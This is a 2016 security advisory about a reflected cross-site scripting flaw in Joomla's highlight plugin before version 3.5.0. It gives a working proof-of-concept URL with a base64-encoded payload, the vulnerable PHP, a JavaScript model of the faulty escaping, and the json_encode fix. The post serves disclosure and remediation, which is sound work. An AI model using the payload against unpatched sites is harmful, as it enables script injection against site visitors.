Monday, 06 June 2016 02:06

Joomla! versions before 3.5.0, including the 2.5.x series (likely all the way back to 1.6.0; no regression testing was done), are vulnerable to reflective XSS:

Joomla! 3.5.0 Reflective XSS
============================

http://[joomla site]/index.php?option=com_finder&highlight=WyJcXCIsIl0pO2FsZXJ0KDEpO1wvXC9cXCJd

Decoded payload: ["\\","]);alert(1);\/\/\\"]

How it works: the highlight plugin base64-decodes the payload, JSON-decodes the
result, then iterates over the resulting array and attempts to clean each entry
before passing the list to the "highlighter" behavior.

The highlighter behavior code "escapes" double quotes by replacing them with \",
but it does not account for any preceding backslash. A term that ends in a
backslash therefore turns the closing quote added by the template into an
escaped quote, which lets the payload break out of the imploded string literal
and execute code.

plugins/system/highlight/highlight.php

                // Get the terms to highlight from the request.
                $terms = $input->request->get('highlight', null, 'base64');
                $terms = $terms ? json_decode(base64_decode($terms)) : null;

                // Check the terms.
                if (empty($terms))
                {
                        return true;
                }

                // Clean the terms array.
                $filter = JFilterInput::getInstance();

                $cleanTerms = array();

                foreach ($terms as $term)
                {
                        $cleanTerms[] = htmlspecialchars($filter->clean($term, 'string'));
                }

                // Activate the highlighter.
                JHtml::_('behavior.highlighter', $cleanTerms);


libraries/cms/html/behavior.php

                $terms = str_replace('"', '\"', $terms);

                $document = JFactory::getDocument();
                $document->addScriptDeclaration("
                        jQuery(function ($) {
                                var start = document.getElementById('" . $start . "');
                                var end = document.getElementById('" . $end . "');
                                if (!start || !end || !Joomla.Highlighter) {
                                        return true;
                                }
                                highlighter = new Joomla.Highlighter({
                                        startElement: start,
                                        endElement: end,
                                        className: '" . $className . "',
                                        onlyWords: false,
                                        tag: '" . $tag . "'
                                }).highlight([\"" . implode('","', $terms) . "\"]);
                                $(start).remove();
                                $(end).remove();
                        });
                ");
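The defect in the str_replace line above comes down to escaping one character while leaving the escape character itself alone. The following is an added example, not code from the Joomla project: a JavaScript model of the PHP string building in behavior.php (the function names buildArrayLiteralNaive, buildArrayLiteralSafe, scanArrayLiteral and literalIsIntact are mine), with JSON.stringify standing in for PHP's json_encode as the corrected encoder. The scanner reads the emitted literal the way a JavaScript tokenizer would, without evaluating anything, and reports which string elements the engine would see and what text is left over after the array closes.

```javascript
// Added example, not Joomla's code: a JavaScript model of the string building
// in libraries/cms/html/behavior.php, showing why escaping only the double
// quote fails and what a correct encoder emits instead.
//
// The vulnerable PHP does, in effect:
//     $terms = str_replace('"', '\"', $terms);
//     "highlight([\"" . implode('","', $terms) . "\"]);"
// buildArrayLiteralNaive() reproduces that. buildArrayLiteralSafe() uses
// JSON.stringify, the JavaScript counterpart of PHP's json_encode(), which
// escapes backslashes as well as quotes, control characters and (since
// ES2019) U+2028/U+2029.

function buildArrayLiteralNaive(terms) {
  const escaped = terms.map((t) => t.replace(/"/g, '\\"'));
  return '["' + escaped.join('","') + '"]';
}

function buildArrayLiteralSafe(terms) {
  return JSON.stringify(terms);
}

// Read an emitted literal the way a JavaScript tokenizer reads an array of
// string literals: a backslash takes the next character literally. Nothing
// is evaluated; the function only reports which string elements the engine
// would see and what text, if any, is left over after the array closes.
// Escape handling is deliberately minimal (\" -> ", \\ -> \); it is enough
// for the terms used here but does not decode \n, \uXXXX and friends.
function scanArrayLiteral(literal) {
  if (literal[0] !== '[') throw new Error('expected "[" at offset 0');
  const elements = [];
  let i = 1;
  while (literal[i] !== ']') {
    if (literal[i] !== '"') throw new Error('expected string at offset ' + i);
    i += 1;
    let s = '';
    while (i < literal.length && literal[i] !== '"') {
      if (literal[i] === '\\') {            // escape: take next char literally
        i += 1;
        if (i >= literal.length) break;
      }
      s += literal[i];
      i += 1;
    }
    if (i >= literal.length) throw new Error('unterminated string literal');
    i += 1;                                 // closing quote
    elements.push(s);
    if (literal[i] === ',') i += 1;
  }
  return { elements, trailing: literal.slice(i + 1) };
}

// Does the engine see exactly the intended terms, and nothing after them?
function literalIsIntact(literal, terms) {
  try {
    const { elements, trailing } = scanArrayLiteral(literal);
    return trailing === '' && elements.length === terms.length &&
      elements.every((e, idx) => e === terms[idx]);
  } catch (err) {
    return false;
  }
}

// The two terms carried by the request on this page, as decoded from its
// base64/JSON payload: a lone backslash, and text ending in a backslash.
const PAGE_TERMS = ['\\', ']);alert(1);//\\'];

function demo() {
  const naive = buildArrayLiteralNaive(PAGE_TERMS);
  const safe = buildArrayLiteralSafe(PAGE_TERMS);
  console.log('naive literal:', naive, scanArrayLiteral(naive));
  console.log('safe literal :', safe, scanArrayLiteral(safe));
  return {
    naiveIntact: literalIsIntact(naive, PAGE_TERMS),  // false: one element, trailing code
    safeIntact: literalIsIntact(safe, PAGE_TERMS),    // true: two elements, nothing trailing
  };
}

demo();
```

Running it shows the naive builder producing `["\","]);alert(1);//\"]`, which the scanner reads as a single element `",` followed by the leftover text `);alert(1);//\"]`, while the JSON-encoded form round-trips both terms with nothing left over. In PHP the equivalent fix is to hand the whole array to json_encode() instead of str_replace plus implode, so every term becomes a well-formed string literal. One caveat: json_encode() leaves `<` and `>` alone by default; here htmlspecialchars() has already run on each term, but in a context without that step the JSON_HEX_TAG flag is what keeps a `</script>` inside a term from closing the inline script block.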

Fixed in 3.5.1: https://github.com/joomla/joomla-cms/pull/9524

Last Updated on Monday, 06 June 2016 02:20
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
